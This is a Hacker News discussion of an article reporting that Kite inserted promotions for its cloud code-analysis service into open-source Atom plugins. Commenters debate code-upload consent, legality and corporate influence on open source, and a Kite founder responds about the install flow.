Hacker News new | past | comments | ask | show | jobs | submit login
How a VC-funded company is undermining the open-source community (theoutline.com)
1014 points by posnet on July 24, 2017 | hide | past | favorite | 415 comments

Look at this clear dark pattern: https://outline-prod.imgix.net/20170721-QVaxMDgDwdZ1TBufCdq4.... (Image taken from the article.) Want to use our service, then only lists positives. Or these other services, then only list negatives.

If you're reading this Kite. I now have a negative view of your product. We cannot allow corporations to take over open source tools. Donating is perfectly fine and encouraged, but the above example is a downright take over. If you want another tool then create one, don't take over an existing one and use the communities trust of that tool to promote your product.

I fell for this. I enabled it because I was curious about trying new development tools, only to find out later it uploaded all of the source code on my computer to their service. What the hell.

It took me months to get through to a human to get them to delete my code, including two emails to the CEO.

I like the idea, but there is no way I would use it after this experience.

WTF, this could get people fired. Many companies do not descriminate whether an employee has uploaded code to a third party server intentionally or not. If corprate software monitors catch this happening, its pink slip in many places. I just can't believe anyone would play with developers this way. What a cruel company.

> WTF, this could get people fired. Many companies do not descriminate whether an employee has uploaded code to a third party server intentionally or not.

That is why developers should be very careful what applications they install on the corporate computer and what cloud services they use.

It's true; "fool me once" and all that. But it really doesn't make the world a better place to live if it's easier to get fired by accident.

It could also get Kite sued.

Someone should definitely sue Kite.

Wait until they get their funding.

> it uploaded all of the source code on my computer to their service.

That sounds crazy, so I reviewed their privacy policy[0]. It looks like Kite now requires users to whitelist the directories it indexes and automatically purges files you remove from the local index.

The Privacy Policy says that:

> When you use our services, we may collect [...] Any source code files on your computer's hard drive that you have explicitly allowed our services to access. To learn how to control access to your source code files, please visit our FAQ.

The FAQ[1] says

> Kite only uploads files that:


> 1. Have a .py file extension,

> 2. Are children of a whitelisted directory,

> 3. And are not ignored by a .kiteignore file.

That doesn't seem like "any source code file on your computer" to me - unless it whitelists root by default, which would be a hella dark pattern.

Also, removing a file from the local index should remove it from the server as well [2]

[0] https://kite.com/privacy [1] http://help.kite.com/category/30-security-privacy [2] http://help.kite.com/article/10-how-do-i-delete-files-from-k...

It sounds like they changed something after I signed up. I am not super paranoid, but I am pretty savvy about privacy and keeping my data safe. There is no way in hell I would have agreed to upload all of my data to their service.

I was actually questioning myself when I realised what had happened -- I thought, "perhaps I just messed up". But after I saw this story about their other dark patterns, I'm convinced they just deceived me.

Their privacy policy as of 31 of December 2016:


Seems similar enough to current version.

If you look at the screenshot posted by one of their founders it lists the user directory as the default whitelist: https://user-images.githubusercontent.com/87728/28395021-e04... and isn't clear on uploading everything from there

Hard to read that wording and not infer it was specifically phrased like that to prevent saying "we upload literally every file, recursively, in the below directory".

Easy to see very intelligent and circumspect people interpreting "where enabled" to mean "when I ask for autocomplete" and "your code" to mean "that specific snippet" because who the hell would actually think it's cool to just carte blanche upload other people's workspaces?

> Also, removing a file from the local index should remove it from the server as well [2]

Maybe you are thinking only for your self. What about the majority of the users of minimap/(other hacked plugins) who doesnt know this is going on, and they are not aware that some files need to be deleted from someone elses server.

ps. i know "hacked" is not the proper term here ,but you get the idea.

I totally agree that putting proprietary integrations into open source packages is shady. However, I don't think that the Minimap "kite promotion" [0] went so far as too actually upload code to Kite's cloud platform. It looks like it just added tool tips that referenced Kite's documentation. That's distracting and unwanted, but not as egregious as uploading your code without permission.

[0] https://github.com/atom-minimap/minimap/commit/16c11d82b889c...

Not sure when you're seeing the privacy policy change was made but as an early user of the Kite desktop tool, directory whitelisting has been in place for a year or more.

If you want to see if they have any of your data, check: https://kite.com/settings/files

I have zero faith this page actually works though. A few months ago I deleted all of my data and I checked back today and it has reappeared. (I uninstalled the client and deleted my login token back then too, so as far as I can see it's their issue.)

I have sent them a stern email to delete my data. If you want your data deleted too, I would recommend doing the same rather than trusting their web interface. None of the emails on their website seem to work, though. Emailing the CEO does work eventually, but I don't want to start a witch hunt. My email is in my profile if you want his email.

wtf are those guys doing, uploading source code without consent feels criminal, source code with app configs/secrets has ultra sensitive information.

anybody has a list of infected packages so others can quickly remove with `apm uninstall ...`?

Well technically you did consent by clicking "Enable Kite". I'm not familiar with Kite but the linked image has a line that says, "Click here to learn more.". I'd wager that it eventually links to a page that explains that all your source will be uploaded to their servers.

Now that doesn't make it any less shady though...

I don't really want to defend Kite, but when it says "Kite achieves this by analyzing your code in the cloud" I would assume that my code is uploaded to the cloud.

Which code is "my code" here?

My assumption from that dialog box would be that at most, the code I currently have open in my editor would be uploaded. Not all the source code on my computer.

How can autocomplete work without looking at all the other code too?

Edit to add: oh, wait, I misunderstood. It grabs all the code on your computer? That's crazy. I just meant it's not totally unreasonable to grab the whole git repo you're working in, say.

Yeah, screw kite.

Exactly. How do they know what is my code, or somebody elses? Dodgy.

If you're going to upload potentially private code from your user's computer to your servers, you better warn him with big fat red letters before you upload a single byte.

If you don't want to defend Kite, why bother defending Kite?

I'm not defending their actions. I'm just saying that I don't think they're as surprising as people make them out to be given the messaging in the product.

Hiding a detail like this into a "read more" is uber-shady. They deserve all the backlash they're getting.

Funny how I now read this as Uber-shady.

This is why some data protection and privacy laws are starting to require active, informed consent before taking some actions, instead of merely specifying "consent".

Even without that, basic contract law in many places requires a degree of mutual understanding for the contract to be valid in the first place. You can't just bury a surprising term with a huge effect deep inside a long legalese document and expect it to actually stand up in court, and if you're doing something dubious and relying on that as your defence then you might be in for some disappointment.

What they did is figuratively a felony (literally a "indictable offense") here in Canada. These guys are going to go to prison. Courts have ruled time and time again that hiding unreasonable or otherwise illegal actions in ToS does not absolve liability or criminality.

Just out of curiosity, what part of this is considered illegal? Not defending Kite here, but it seems that even though they are using some shady tactics to gain users, none of their product/ToS seems illegal.

Theft of copyrighted material, if bfirsh's claim of having the tool upload _all of the source code on his computer_ without asking about it.

Maybe even corporate espionage.

> Theft of copyrighted material

Copyright infringement is not theft. These are two completely different issues. When data is copied it is not taken away from the owner like when physical goods are stolen. Secondary damages may or may not occur, but they are not the same as depriving someone of a good. As an analogy, I wouldn't steal a car, but I surely would copy a car if I could do so by simply pressing a button...

This isn't necessarily only about copyright infringement (though it's definitely that too). If some of the source code on your machine contain sensitive information, like API keys, database passwords, etc.

Legally, the word "theft" isn't only used when one party loses anything; a victim of identity theft doesn't lose their identity, yet we don't call it "identity infringement". I'm not familiar enough with US law to know for sure, but it wouldn't surprise me if the word "theft" is used somewhere for obtaining sensitive information without permission.

Nuh huh

It's one thing to infringe on the copyright of a public work

Another, very different thing is to copy something that's not public and might be considered IP or a trade secret

Both are punishable crimes though, so I don't see what difference the point makes

The primary difference is that copyright infringement is a civil offense, not a criminal one, so nobody would be "going to prison".

That still leaves corporate espionage, which (last I checked) is a very severe offense. If that "source code" contained significantly-sensitive data (like medical info or info about legal cases), then there's a giant can of worms right there (and each of those worms has a surname of "Felony").

Copyright Infringement is an act, and at least here in the US, an act which both criminal and civil laws provides specific penalties/remedies. On the criminal side, obviously, one of the penalties is imprisonment.

Ah, I was unfamiliar with criminal penalties for copyright infringement. Could you go ahead and link me to the relevant US Code text that provides for such penalties?


This happens to be the one under which Kite would fall (since they're infringing copyright for "commercial advantage").

There is such a thing, in the US at least, as criminal copyright infringement.

No, but if that copyright material contained trade secrets then it is criminal.

And if it contained gold, it's actual theft.

But that's about as unlikely as the code containing trade secrets.


- For copyright infringement, they'd need to actually redistribute the code. Using it for machine learning and distributing short snippets wouldn't be copyright infringement.

- For that trade secret stuff you'd need to prove intent.

For copyright infringement, they'd need to actually redistribute the code.

IANAL, but I don't think so. In MAI v. Peak[1], the court determined that even loading a program from disk to RAM was a copy, and therefore infringing without a license. Congress has since then added a specific exception for "Machine maintenance and repair", but that's it. Copying from a remote machine and storing it in their disks should certainly qualify.

[1] https://en.wikipedia.org/wiki/MAI_Systems_Corp._v._Peak_Comp....

> But that's about as unlikely as the code containing trade secrets.

Unpublished code, is itself a trade secret. Even just the processes, procedures, organisation, tooling, library use, etc in the code provides a competitive advantage. i.e. The 'metadata' is also a trade secret.

The only intent you'd need to prove is that the accused is using the trade secret to the 'economic benefit of anyone other than the owner'.

It seems obvious that Kite is training a proprietary ML algorithm, with trade secrets, for their own economic benefit.

Makes me imagine some angry and equally shady person might contribute to some open source projects that Kite uses internally. With a ToS addition giving them access to all available data on the company network if you are Kite.

Obviously this would a be a terrible thing to do and no one should.

It does not just feel criminal, it probably is. On top of that it might make you liable for reproducing some company code without permission. Very very bad idea.

I've almost been bitten by them in the same way. I vaguely remember that it was through HN that I found out about Kite and installed their plugin(s). It definitely felt 'dirty'.

>only to find out later it uploaded all of the source code on my computer

It didn't ask? Sounds like malware, and meets the definition of theft. Inviting someone into your house does not give them permission to steal things in your home, and leave with them.

Kite has been mentioned few times in hn, latest here: https://news.ycombinator.com/item?id=13977982

It clearly states in the diagram that the code you run Kite on will be analyzed in the cloud. If it truly uploaded "all of the source code on [your] computer" then obviously that is radically different but from my experience with the product, it did not upload my code besides what was directly related to what I was working on and understood would be analyzed in the cloud, just like Code Climate or any other code analysis service.

That could be enough to get your fired and or sued depending on the status of the code on your computer.

That is theft of the highest order!!!

It's not theft, neither sorted nor random.

I would not forget to mention the owners of these projects who handed the projects over to Kite. I think they are in the wrong as much as Kite.

Iff they had foreknowledge that the changes were going to happen, which is unlikely. Id be surprised if Kite bought/acquihired/etc the product by disclosing a list of shady changes beforehand.

The minimap author, committing those changes after being hired by them, labelled them "Implement Kite Promotion".

The question remains, would he have accepted the purchase/job if he had known that Kite intended to do this? My point is that he probably didn't know until instructed to do so my his new bosses.

At which point he did it and is equally responsible as if he knew beforehand.

Beautiful use of "iff" in a sentence! ("iff" = "if and only if" for those wondering).

Contrarily, I would be surprised if the devs sold their code without asking, “why do you want it?”

Isn't that a bit too witch-huntery? It is Kite who is actively doing the shady stuff.

One of the owners was hired by Kite half a year ago.

This changes their power dynamic. One could argue they ought to find another job once the shady stuff started, but I still think you should focus on the actual instigators rather than the pawns.

In a security-sensitive corporate setting it is already harmful if anything gets uploaded to some cloud service - if this occurs, the damage already happens and anything that follows is "just" damage containment.

I believe about every company that develops software has some clauses about what software is allowed to be installed on the corporate computers and who has to initial any request to install a new program on the computer.

It's interesting watching HN get indignant when a company treats them the same way their idol companies treat everyone else. A lot of grab all data, track everything, and hide the creepiness in fine print type companies.

A system of permissions for plugins would be welcome in my mind for Atom, similar to browser plugins or mobile apps. Then a new "feature" would require the "transmit your code to a third party" permission.

How would you enforce that?

Please share the link for writing the negative review. It will make it easier for others as well to leave one.

> We cannot allow corporations to take over open source tools.

I don’t know how much I agree with that statement in general. There are several major open source projects with corporate “control” – Mozilla, Google and Apple control/heavily influence Firefox, Angular and Swift respectively and there are probably a dozen others. The idea that corporations are “bad” is a tired trope. Some corporations are bad, some are good, some are in the middle.

But I agree with your actual actual sentiment though – corporate involvement in open source should be as benevolent as possible.

"Some corporations are bad, some are good, some are in the middle."

I don't think we need to bring morality to the discussion and complicate the issue.

Corporations are organized around profit, open-source is not. With only that in mind you can predict what will happen in most of the cases.

To put Mozilla, a not-profit, in this context, in the same set that Google and Apple is not fair, by the way.

"Corporations are organized around profit, open-source is not. With only that in mind you can predict what will happen in most of the cases. "

All three of these statements seem like nonsense.

First, "Corporations are organized around profit". No, they are legal entities, organized around articles of incorporation. These have a purpose statement. Often, those purpose statements are directed toward lawful business goals. But you do not have to be.

Non-profit vs profit corporations can, quite literally, have the same set of purposes. The only difference between the two is what you can do with profits.

"open-source is not".

I'm not even sure what you are trying to say here. Very large amounts of popular open source, is, in fact, produced by for-profit companies, and has been since the beginning of open-source. The term was even created by a group of people at a for-profit company. So ....

"With only that in mind you can predict what will happen in most of the cases."

No, you can let whatever biases you seem to have stoke your imagination and prognosticate. You can't actually predict what will happen. There are plenty of happy, well functioning for-profit companies in open source that have been helping open source for many many many years. There are also plenty of non-profits that have harmed open source greatly.

It takes a lot of blindness to see this stuff as simply black and white.

So let's discuss your argument by taking Red Hat. For-profit, pure open source company. Founded 1993. Are we (I work at Red Hat) behaving badly?

I explicitly tried to put out "god" and "bad" from the discussion but OK, let's do that.

Red-Hat main worry is to be profitable. That's is above any other concern.

You can be sure that, if their bottom line was threatened, they will be pushed, in order to survive, to change their business model and they will not be beyond behaving in a "bad" (but legal) way if they don't see other way around the problem.

If fact, we can argue, that Red-Hat management, being it a public company, is forced by law to do that.

I'm sure you're aware of the Solaris exodus that happened when Oracle decided to make OpenSolaris proprietary after acquiring it from Sun. The entire OpenSolaris engineering division quit in the span of a month. Do you think the same wouldn't happen if RedHat decided to start doing horrible things to their customers or the community?

You're acting as though nobody who works at Red Hat cares about the community which they worked with before they had a job at Red Hat. I work at SUSE, and I work primarily as a member of a community. If SUSE started mistreating their customers or the wider community I would quit.

I hope that if you found that your company was mistreating the wider community you would also quit.


My point is not that "all companies are good". I'm saying that making a judgement that "all companies will harm free software at the end of the day" ignores the fact that companies still need humans to work for them that do said contributions. Personally I find that many people who work in free software have quite strong ethics when it comes to things like this, but that's just my anecdote.

I see this touch you personally, so I want to apologize if I bothered you.

I have no idea how Red Hat or SUSE would act, maybe they would be an exception, and, maybe, very ethical workers could keep some companies in check.

In the other hand, I don't think that the idea of companies, in order to survive, will try anything (legal), should be so polemic.

My (somewhat strong, sorry about that) response was mainly a reaction to the larger trend I've seen in the free software community as of late -- that companies that work on free software are somehow a net negative.

I don't know where this view comes from, it was Stallman's goal from day one that it should be possible to have companies built around free software. The fact that my first job out of high school was working at a free software company should be celebrated as a huge accomplishment by the wider community. But it's not seen that way. I find it quite disheartening, because I've always been an advocate for free software and my job title doesn't suddenly change that.

I realise that you're not saying that (and so I'm sorry for the strong response), and of course we must question the motives of companies. But it's become a popular game these days to pretend as though everything that a free software developer does as part of a job must be part of a conspiracy to create a monopoly -- it's ludicrous and is quite grating.

History has proven time and over it's generally a very bad idea to be dependent on others' good will that is by nature self interested and ephemeral.

I think people are interested in their basics, income, job, family before any other priorities.

Some people infact become so paranoid about this they may overlook even support unethical action as long as they are safe.

Surveillance, profiling and dark patterns by leading SV companies including Google, Facebook, Palantir etc composed of tens of thousands of engineers who may at one time have loudly proclaimed contrary values is just one example of this.

But how, in the end, did that affect Oracle? Did their stock price drop? Were they unable to sell things? Or did business kinda go on as usual?

The comparison isn't as appropriate, as Oracle is a much bigger company, and is able to handle the loss of that many people in a better way. But the jist is similar.

Oracle Solaris is on life support because they don't have any of the old engineers. They have not worked on ZFS or DTrace since then (and the illumos community has massively improved those projects in the meantime). Recent news makes it look like Oracle Solaris may be killed quite soon.

That was the result, they tried to mistreat the OpenSolaris community and then Oracle no longer was competitive in the Solaris space.

If you want to learn more, check out bcantrill's talk. https://m.youtube.com/watch?v=-zRN7XLCRhc

If fact, we can argue, that Red-Hat management, being it a public company, is forced by law to do that.

You could argue that, but you would almost certainly be wrong. It is a myth that management at a company is always required to seek profit above everything else. Indeed, many companies explicitly do not do this, for example by having policies about operating in an environmentally friendly way for ethical reasons.

Companies have policies until they stop having them.

I'm not saying that companies have to search profit above everything, I am saying that it's its main concern, otherwise they will not survive.

Indeed, management will have space to be nice when things go well, but they, automatically, will receive pressures from investors to change their nice ways when things go bad.

This is the way that it's intended to work and there is, I think, nothing surprising there.

Even if it were as simple as that, it wouldn't be as simple as that!

There's a difference between short-term and long-term profitability. Being 'nice' might limit profits in the short term but might be crucial for long-term survival.

And, nobody knows for sure what the correct long-term strategy is. Not every step that yields an immediate profit is a step in the right direction.

did you support and push systemd?

Corporations are just legal structures.

For instance, you call Mozilla a non-profit. But it is a non-profit corporation, a legal entity that has organized itself in a certain way and applied for special tax treatment.

For profit or non-profit, makes a huge difference, in my opinion.

The goals and the incentives are very different.

Isn't Mozilla organized as a for-profit that owns a non-profit? Actually, if you look at US tax law there are reasons that some non-profits have for-profit parts. I know Mayo was organized that way. I think it had to do with some salary requirements, but its been twenty years, so I'm a bit fuzzy.

There is a non-profit (The Mozilla Foundation, affectionately referred to as "mofo") which owns a for-profit (The Mozilla Corporation, known as "moco") as a wholly-owned subsidiary.

The corporation is governed by the same rules as the foundation, compare https://www.mozilla.org/en-US/foundation/

> Our work is guided by the Mozilla Manifesto.

to https://www.mozilla.org/en-US/foundation/moco/

> The Mozilla Corporation is guided by the principles of the Mozilla Manifesto.

(I'm an employee of moco, I've always felt like I'm working at a values-based rather than a profit-based organization, personally.)

I guess my point is that the profit status might not be the most important thing to determine what values your organization has.

The Mozilla non profit is the owner of a for profit company that carries out much of their activity. Which you probably meant, but you've typed it the other way around.

Yeah, I meant in the same way as Mayo (NP -> FP). Not enough coffee, thanks.

Sure, as stated in the articles of incorporation. Many states offer an in-between type of corporation called a benefit corporation. It is for-profit, but the articles of incorporation require it behave, additionally, with social benefit in mind. And they are obligated by their charter, and can be dissolved by the state responsible for the entity's creation, if they don't follow it. The public would have some degree of standing that wouldn't necessarily apply to other corporations.

Technically, non-profit only means that the corporation is not allowed to directly redistribute profit to it's shareholders. This reduces the amount of pressure from shareholders to generate large profits, but still even non-profit corporation has to pay it's expeditures somehow and not lose money doing so.

> This reduces the amount of pressure from shareholders to generate large profits

Just to clarify, since this sentence was ambiguous: not-for-profit companies do not have shareholders or owners. So the fact that there is no "pressure from shareholders" is vacuously true, because there are no shareholders.

Not-for-profits typically have donors and boards of directors, who both apply pressure to see the corporation's funds used to realize its mission.

When I wrote that sentence I thought about changing "shareholders" to "members" or "stakeholders", but then I left it as it was because it seemed to more clearly represent the contrast or absence there of to for-profit corporation.

I'm board member of smallish Czech non-profit and one of the things I've found out is that the legal requirements on the corporate governance structure are mostly equivalent to what is required for publicly tradeable corporation that is actually not publicly traded, thus for me it makes some sense to equate voting members to shareholders.

> With only that in mind you can predict what will happen in most of the cases.

With just this information and no other, I think I'd predict corporations to make better software than open source. I take it that's not what you had in mind.

(This is for similar reasons that I expect for-profit companies to provide better service than government-run ones. I don't particularly want to get into a debate right now about whether that actually happens, just trying to explain my intuitions.)

I'd agree with this. We can all agree Windows is infinitely better than Linux because people pay for it.

Also Internet Explorer is infinitely better than Chrome and Firefox.

For a non-technical user Windows is the infinitely better product than typical Linux desktops, you should see the pain that people go through that use commercial software nominally supported on Linux such as Cadence tools compared to the same experience on Windows, not to mention the lack of any serious well made office suite.

Heck in direct comparison Ubuntu 16.04 looks like a joke system compared to Windows 10, for example Ubuntu doesn't let me use my on board sound and only displays the dedicated sound card, but only half of the time. It has a horrible toy like ripped off user interface with ugly buttons, I can't think of a single application that is actually better than an equivalent application that is also available on Windows.The only reason I'm using Linux is because in a lot of areas including the field I work in it has achieved the same lock in that windows has for the general desktop market.

It is kind of sad that the only two alternatives are a clone of 70s technology or a clone of 80s technology. I feel like there should be a way to get things unstuck, but research into operating system design has all but ceased, with very few exceptions, many of them ironically coming from Microsoft.

Ubuntu is backed by Canonical Ltd. so it's corp vs. a much bigger corp. Linux as server vs Windows Server might be a more appropriate comparison for this.

It's so frustrating that the data derived from this reality never agrees with these simple economic theories I derived from first principles and my econ 101 class that are so obviously correct.

I blame the so-called "experts" and their propaganda about "complexity" and "human behaviour" for distorting the efficient market. In the cases of historical data it seems they have even retroactively distorted the markets.

I didn't say corporations make better software than open source. I said that if I had only a single piece of information that's the prediction I'd make.

I have opinions about to what extent my counterfactual prediction is correct; and to what extent it's not; and why it fails, in the cases that it fails. I left them out because they weren't relevant. If you wanted to talk about them, that's a thing I might be willing to do. But I'm not interested in being snarkily accused of mistakes I didn't make.

I have no idea who makes better software.

What I mean is this: If you mix open-source with a for-profit entity, don't be surprise when that entity try to extract profits even in orthogonal ways to the original intention of the project.

Of course, in practice, and by the nature of open-source, this is a very difficult to do and, normally, can be prevented, but the trend is there and should be take into account.

Mozilla made firefox. Google made angular. Apple made Swift. That's not "taking over". While I am not a fan of this phenomenon either, that has nothing to do with the current situation. They simply built something and open sourced it, nothing was "taken over".

I'm going to take a contrarian stance on this one: I believe there is no story here — adding an ad for an opt-in cloud-based tool to dev tools is not spyware. It's opt-in! It's clearly stated. Would people raise a fuss to find out their CI service like CircleCI or linter service like Code Climate had access to their code (it's sufficiently obvious)? I don't really see why this tool is any different other than they are one of the first to make a code analysis service that runs in realtime.

I beta tested the Kite product when it first launched maybe two years ago. I don't use it today but I would try it again. Since then they've only tightened down on permissions and made things clearer.

Kite was also not the first to run ads in an IDE plugin (Wes Bos has sponsored several), at least not in Sublime. Personally it's not my preference to have ads either but ultimately this is up to the maintainer of each repo. The tool is still free to use. It clearly states that using the cloud engine will upload your code to do analysis in the cloud. It's 2-3 sentences, not like it's buried in some long EULA.

Shame on the article for labeling inserting an ad as "taking over" and labeling an ad as "spyware"… pure clickbait targeting non-devs.

The new Kite engine also clearly states it is a cloud-based service and they build integrations for their service. The whole industy works the same way. You don't have to use their engine to use autocomplete-python and its opt-in too.

It is opt out. You can read the comments from the Kite developer yourself.


Your comments are such a poor defense of a dubious feature I wonder if you have a connection to Kite.

It appears you have misunderstood my argument. The atom-minimap extension you linked is not the autocomplete-python extension discussed in the parent thread. I have not used the atom-minimap extension and didn't make any comments on it — I use Sublime. My comments are about the autocomplete-python extension.

I think you're overlooking the diagram linked above which shows enabling the Kite engine is an opt-in button click. The CEO also states that it is opt-in in the article: "Most users who install autocomplete-python close the engine selection prompt, which results in not getting Kite or its benefits," [the CEO] said in an email.


As I stated above, I beta tested the Kite product early on and have used it in Sublime through a similar add-on. I am not a current customer / user, but I do make my own dev tools. It was always completely transparent to me that they are sending code to their server to run a cloud analysis platform. Based on that, I still maintain that the community is massively overreacting to something that was made explicit upfront.

Well, who benefits from having the ads there? Wouldn't it be better for most users without the ads? What value is Kite adding?

It's a slippery slope, similar to the controversies over using BitKeeper for the Linux kernel or adding DRM to HTML5 (both justified, I think). The openness in open source needs to be defended.

While I would not argue anything about ads directly, I think that all users benefit from having additional options in the plugin, and if the ad is relevant to a portion of users and leads to some users discovering an additional dev tool for their workflow than it was worthwhile. That is the perspective I have in mind for the hypothesis that Kite was testing.

I genuinely don't understand why this service is getting a disproportionate amount of backlash relative to the plethora of cloud based services out there that analyze one's entire codebase. Maybe it's because they're interacting with the code from the dev machine directly vs integrating with repos on the git server? Would that make it different to you?

The massive difference is that Kite is using manipulative, dishonest tactics.

When I sign up for a service like Code Climate it's very clear that I am giving them access to some of my code. I also have easy control over what code they can see. They are honest and upfront about what they are doing and why.

Kite has been trying to hide what they are doing, with the goal of tricking developers into doing things they otherwise wouldn't. They're taking advantage of the huge amount of trust in the open source community. Kite must know that abusing this trust has a high chance of hurting the community, but they don't seem to care, as long as they can make a quick buck or two for themselves.

A lot of people here really cherish that trust and goodwill among strangers in the open source world, and are understandably pretty pissed when someone comes along and messes with it.

The bottom line though is being honest and upfront with developers. I suspect Kite could have been a bit more forward about what they were doing and the developer community would have reacted with much less outrage.

Where I work, the VPE signed up for Code Climate. Code Climate also gets our code by asking for git creds, making it very clear what they're doing.

Installing Kite and accidentally allowing them to sucker me into uploading the entire corporate source tree -- quite possibly with creds -- is literally a walk you out fuckup. At bare minimum I would have to page ops and roll creds on every bit of prod. Want to know why there's both a gitignore and a git commit hook making sure 'config/creds.py' is not uploaded anywhere?

There's virtually no ethical way to build that dialog unless you put 40 point red font saying "We upload your entire source tree" and make you wait 10 minutes before continuing. This is not a decision line level devs are allowed to make on their own, and Kite tricks them into doing exactly that.

Hi Ruben, founder of Kite here. I think this issue deserves a more thorough response because there are a lot of misrepresentations in the article.

One misrepresentation that I wanted to quickly highlight is that the autocomplete-python install flow has three steps, not just the one linked in to in the screenshot above. The other two are:

Enter their email address - https://user-images.githubusercontent.com/87728/28395016-dc7...

Read a warning, decide if they want to whitelist any files - https://user-images.githubusercontent.com/87728/28395021-e04...

Small technicality: these screenshots say that Kite is installing but it's actually only downloading the installer binary to memory; the actual install doesn't happen unless the user goes through all three steps.

It's also worth noting that if the user clicks "Add Later" no code is sent to the Kite servers for analysis until they whitelist a directory.

You are trying to blame the user, but the design of this flow is to blame. It does not explain clearly what is going on.

It's funny seeing this now to see where I tripped up. When you say "enable access in /Users/ben", I guess 6-months-ago-me assumed it meant "enable access to code in /Users/ben when I am working on it". It felt a bit like an iOS permissions dialog, where I was giving you access to my filesystem. Parsing it now, I realise that the text above the button says "where enabled, your code is sent to our cloud".

You could argue I should have read that more carefully, but that copy doesn't scream to me "I'm about to upload all of the source code on your computer including proprietary stuff and secrets". Because that button was the default highlighted button, I assumed it wasn't going to do anything drastic like that. (It's like Ryanair having a big red "YES I WOULD LIKE INSURANCE" button, hiding the "no I don't want to spend $100" button somewhere in the small print.)

Above all, you certainly shouldn't have included that as a shady update to some Atom extension I was using.

> I think this issue deserves a more thorough response because there are a lot of misrepresentations in the article.

From the article:

> Smith also said that most of the negative reaction was due to confusion around what the tools actually do. (Connor pointed out that it’s not possible to review what Kite does, since it itself is not open source.) Then he blew this reporter off. “I apologize in advance that I can't answer any further questions,” he wrote. “I need to focus on other parts of the business, including continuing to improve the product for our users, and conflict like this is always doubly distracting.”

The above sounds like you were given the opportunity to explain things but shrugged it off as a distraction.

If it deserves a more thorough response, why hasn't that been given? Even in this reply you only "quickly highlight" one point.

Yeah, I came here to say exactly this.

Even with the additional steps and even with explicit whitelisting of directories (from screenshots it looks like it defaults to the user directory, which is just bad) before code's uploaded, the point is that Kite took over a useful, popular open source package, clearly hitching on to the popularity of the package to promote Kite, which is distasteful when it comes to OSS.

Why not fork the original autocomplete-python with one that has Kite enabled instead? Then users who want Kite or use Kite are able to do so, without screwing over everyone else who have no idea what Kite is and dont want anything to do with it.

Reminds me of software downloaded in the past that comes with some random search toolbar that gets installed in browsers. Annoying. Shady. Not cool.

This. That would have been the correct solution. Fork the code and offer their "Kite enabled" version separately. If Kite has to resort to these type of tactics to push their product it seriously makes me doubt it's efficacy. If they can't market their product based on it's merits, why would I want to use it?


The post you are responding to is by Adam, adamsmith, the CEO of Kite. We are different people and I have no relation to him at all. Just to be clear.

Edit: disregard this comment...

According to your and his comments on this page you two co-founded Kite, how is that "no relation at all?"

Read again. adamsmith said "Hi Ruben" to start his post and then said the he (adam) is a founder.

Whoops, my mistake. Edited original comment.

This situation seems to have the best and worst of open-source. Best, in that the license of the projects allowed them to be forked without too much effort. Worst, in that it shows how easy it is for a project to be subverted once the maintainers are bought (in this case, given a job). It also remains to be seen if the average Atom user will see the difference between the Kite-branded (and, currently, more popular) and the forked versions of these plugins.

Besides the open source issues, this tactic seems to reveal a massive desperation by the Kite folks. There is no way they couldn't have seen how negative this was going to look once people found out. Their ability to attract new users through word-of-mouth and organic advertising must have plateaued. Sneaking their service into a well-used plugin would have given them a boost in users, maybe enough to attract a new round of funding, but they must have known it would cause this kind of bad blood. Especially based on their past reception on HN, which was highly upvoted but in which they never convincingly answered the concerns about uploading users' source code to the cloud:




> this tactic seems to reveal a massive desperation by the Kite folks

That's the weirdest part to me. Who, exactly, thought this was going to go well? It is hard to be sneaky with open source. And even harder to win back goodwill after being caught out.

For instance, now that I know, it would take a change of management and business model before I'd even consider running any of their code, and I'll be writing a Kite-detector for our code scanning tool this week.

There's a great quote from Kite founder 'alexflint in one of those earlier threads:

"our plan is to earn trust the hard (i.e. only) way: transparency, published policies, and a track record of good decision making."

Easier said than done, apparently.

Kudos to @mehcode for the fork [1]! And the author @abe33 for the apology [2]! I'm thinking, that @abe33 might not be responsible for this, but was "asked" by his employer (Kite) to do that.

Then, there are alternatives such as sublimetext/vscode, which have the minimap builtin...

Disclaimer: Not affiliated, I prefer n/vim anyways. This is a copy from my comment in the issue. Please read @abe33's comment [2] in the issue. This might explain a thing or two.


[1]: https://github.com/mehcode/atom-minimap-plus

[2]: https://github.com/atom-minimap/minimap/issues/588#issuecomm...

That's a pretty sorry excuse for an apology, in my opinion.

First, he focuses heavily on how much stress the backlash has caused him. Then he tries to paint it as a "misunderstanding" on behalf of the users. None of this strikes me as the behavior of someone taking full responsibility for their actions.

Further, I keep seeing people trying to justify his actions with the pathetic excuse that he was probably just doing as told by his employer. Sorry folks, that's not how being an adult works. There's a reason virtually every formal code of ethics stresses personal responsibility. Take, for instance, 8-b from https://www.nspe.org/resources/ethics/code-ethics

  Engineers shall not use association with a nonengineer, a corporation, or partnership as a "cloak" for unethical acts.
Or the very first point from http://www.acm.org/about/se-code

  Software engineers shall act consistently with the public interest. In particular, software engineers shall, as appropriate:
  1.01. Accept full responsibility for their own work.
Just because we're in the comparatively-"lower stakes" profession of web development, that doesn't mean we can use the sorry-ass excuse of "my boss told me to do it." Unless they held a gun to his head, he had a choice, and his choice should stick with his reputation for better or worse. Now his name is going to be attached this dumpster fire of a PR mess because he didn't have the will or integrity to say no, and smart people within the community will have a very good reason to no longer trust his judgement, much less his future contributions.

Thanks for posting abe33's apology, hadn't seen it when I read about this issue last week. One of the more unnerving things about it was how he made this change without explanation months ago nor did he did he explain it now. It must have been frustrating for him, as the plugin's original developer, to be dragged through this crap. He ultimately is responsible for his actions, but I wonder if he knew that subverting his own plugin would be a job requirement?

I can't imagine he would sabotage his own project for no reason, so most likely he got the job or some compensation in exchange for his cooperation and access to his repository, probably how they got python-autocomplete too.

Otherwise, if they offered the job with no conditions attached he'd be under no obligation to change his own personal projects for them.

Yeah, I was wondering if Kite had a deliberate strategy to inject themselves into popular IDE-plugins, and their hiring plan includes reaching out to such creators. It's not unthinkable that they would slip in such an obligation after the contract is signed. I mean, we're talking about a company that conspired to covertly slip in these dark-pattern ads into mainstream open-source plugins. Ideally, the minimap creator could have taken a moral stand and quit, but I imagine his work situation and prospects (being from Europe) is different than if he were a developer in the Bay Area.

This would actually be a smart and ethical strategy, if the changes were made in a way that they were opt-in and clear about what they were doing. Unfortunately it looks like they got greedy, and this is what happens when you dance the line: much easier to cross it.

While I could see how it can be done in a way that isn't outright unethical, it still strikes me as 'wrong' in the sense that it betrays my expectations of how open source works and relates to for-profit endeavors.

